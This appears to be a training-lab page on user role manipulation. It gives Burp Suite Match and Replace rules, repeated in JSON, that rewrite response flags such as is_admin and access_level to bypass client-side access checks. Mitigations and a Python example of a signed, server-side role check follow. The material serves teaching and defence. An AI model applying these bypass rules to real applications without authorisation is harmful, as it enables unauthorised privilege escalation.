Lab 9: User Role Manipulation

User role manipulation via response manipulation vulnerabilities

Difficulty: High

Lab Overview

This lab demonstrates user role manipulation vulnerabilities where attackers can use Burp Suite to modify role responses and bypass role restrictions.

Objective: Understand how user role manipulation attacks work and how to exploit them using Burp Suite.

User Role System
Check Role

Test user role with response manipulation:


Check Permissions

Check user permissions:


Check Access

Check user access to resources:

User Role Manipulation Tester
⚠️ User Role Manipulation Warning

This lab demonstrates user role manipulation vulnerabilities:

  • Role Bypass - Bypass role restrictions
  • Permission Bypass - Bypass permission checks
  • Access Bypass - Bypass access controls
  • Privilege Escalation - Escalate user privileges
Burp Suite Rules

Use these Burp Suite Match and Replace rules:

  • "has_role":false"has_role":true
  • "is_admin":false"is_admin":true
  • "has_permission":false"has_permission":true
  • "has_access":false"has_access":true
User Role Manipulation Rules
Role Bypass
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"has_role\":false", "string_replace": "\"has_role\":true" }
Admin Bypass
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"is_admin\":false", "string_replace": "\"is_admin\":true" }
Permission Bypass
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"has_permission\":false", "string_replace": "\"has_permission\":true" }
Access Bypass
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"has_access\":false", "string_replace": "\"has_access\":true" }
Role Status Bypass
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"role_status\":\"unauthorized\"", "string_replace": "\"role_status\":\"authorized\"" }
Permission Status Bypass
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"permission_status\":\"denied\"", "string_replace": "\"permission_status\":\"granted\"" }
Vulnerability Details
  • Type: User Role Manipulation
  • Severity: Critical
  • Method: Burp Suite Match and Replace
  • Issue: Client-side trust of role responses
Attack Vectors
  • Role Bypass: Bypass role restrictions
  • Permission Bypass: Bypass permission checks
  • Access Bypass: Bypass access controls
  • Privilege Escalation: Escalate user privileges
User Role Manipulation Examples

Use these Burp Suite Match and Replace rules to exploit user role manipulation vulnerabilities:

1. Role Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"has_role\":false", "string_replace": "\"has_role\":true" }
This rule bypasses role restrictions. Example: "has_role":false becomes "has_role":true
2. Admin Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"is_admin\":false", "string_replace": "\"is_admin\":true" }
This rule bypasses admin restrictions. Example: "is_admin":false becomes "is_admin":true
3. Permission Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"has_permission\":false", "string_replace": "\"has_permission\":true" }
This rule bypasses permission checks. Example: "has_permission":false becomes "has_permission":true
4. Access Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"has_access\":false", "string_replace": "\"has_access\":true" }
This rule bypasses access controls. Example: "has_access":false becomes "has_access":true
5. Role Status Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"role_status\":\"unauthorized\"", "string_replace": "\"role_status\":\"authorized\"" }
This rule bypasses the role status check. Example: "role_status":"unauthorized" becomes "role_status":"authorized"
6. Permission Status Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"permission_status\":\"denied\"", "string_replace": "\"permission_status\":\"granted\"" }
This rule bypasses the permission status check. Example: "permission_status":"denied" becomes "permission_status":"granted"
7. Access Level Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"access_level\":\"user\"", "string_replace": "\"access_level\":\"admin\"" }
This rule bypasses the access level check. Example: "access_level":"user" becomes "access_level":"admin"
8. User Type Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"user_type\":\"regular\"", "string_replace": "\"user_type\":\"admin\"" }
This rule bypasses the user type check. Example: "user_type":"regular" becomes "user_type":"admin"
9. Privilege Level Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"privilege_level\":\"low\"", "string_replace": "\"privilege_level\":\"high\"" }
This rule bypasses the privilege level check. Example: "privilege_level":"low" becomes "privilege_level":"high"
10. Role Assignment Bypass:
{ "comment": "Response Manipulation", "enabled": true, "is_simple_match": false, "rule_type": "response_body", "string_match": "\"role_assigned\":false", "string_replace": "\"role_assigned\":true" }
This rule bypasses the role assignment check. Example: "role_assigned":false becomes "role_assigned":true
Real-World Attack Scenarios
Mitigation Strategies
  • Implement server-side role validation
  • Use response integrity checks and signatures
  • Implement proper role controls
  • Use secure coding practices
  • Regular security testing and vulnerability assessments
  • Monitor for unusual role patterns
  • Implement proper input validation
  • Use multi-factor authentication
  • Implement proper error handling
  • Educate users about security threats
  • Use role bypass detection tools
  • Implement proper audit trails
  • Use role-based access control (RBAC)
  • Implement proper privilege management
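The root issue listed under Vulnerability Details (client-side trust of role responses) and the first two mitigations (server-side role validation, response integrity signatures) side by side, as an added example that is not part of the lab's own code: a simulated server issues the same "has_role"/"is_admin" JSON the lab's rules target, a function replays what a response_body Match and Replace rule does to it, a vulnerable client gate trusts the altered flag, and a hardened endpoint rejects it because it verifies an HMAC over the claim and re-derives authorization from its own session store. The secret key, session store and function names are constructed assumptions.

```python
import hashlib
import hmac
import json

# Constructed server-side secret and session store (assumptions, not from the lab).
SERVER_KEY = b"constructed-server-secret"
SESSIONS = {
    "sess-alice": {"user": "alice", "roles": ["user"]},
    "sess-bob": {"user": "bob", "roles": ["user", "admin"]},
}

def _sign(raw: str) -> str:
    """HMAC-SHA256 over the exact bytes of the role JSON."""
    return hmac.new(SERVER_KEY, raw.encode(), hashlib.sha256).hexdigest()

def issue_role_response(session_id: str) -> str:
    """Server builds the role JSON (same key names as the lab) and signs it."""
    sess = SESSIONS[session_id]
    body = {"has_role": "user" in sess["roles"], "is_admin": "admin" in sess["roles"]}
    raw = json.dumps(body, separators=(",", ":"), sort_keys=True)  # e.g. {"has_role":true,"is_admin":false}
    return json.dumps({"body": raw, "sig": _sign(raw)})

def apply_match_replace(wire: str, match: str, replace: str) -> str:
    """Replays what the lab's response_body Match and Replace rule does in transit."""
    env = json.loads(wire)
    env["body"] = env["body"].replace(match, replace)
    return json.dumps(env)

def vulnerable_client_gate(wire: str) -> bool:
    """Vulnerable pattern: the client shows admin UI based on the flag as received."""
    return json.loads(json.loads(wire)["body"])["is_admin"]

def admin_endpoint(session_id: str, presented: str) -> int:
    """Hardened pattern: verify the signature of any role claim the client hands
    back, then decide from the server's own session store, never from the claim."""
    env = json.loads(presented)
    if not hmac.compare_digest(_sign(env["body"]), env["sig"]):
        return 403  # body altered after signing (e.g. by a proxy rule)
    sess = SESSIONS.get(session_id)
    if sess is None or "admin" not in sess["roles"]:
        return 403  # authorization derived server-side
    return 200
```

Applying the lab's "is_admin" rule flips what the vulnerable client displays, but the hardened endpoint still answers 403 for the same session because the tampered body no longer matches its signature and the session holds no admin role.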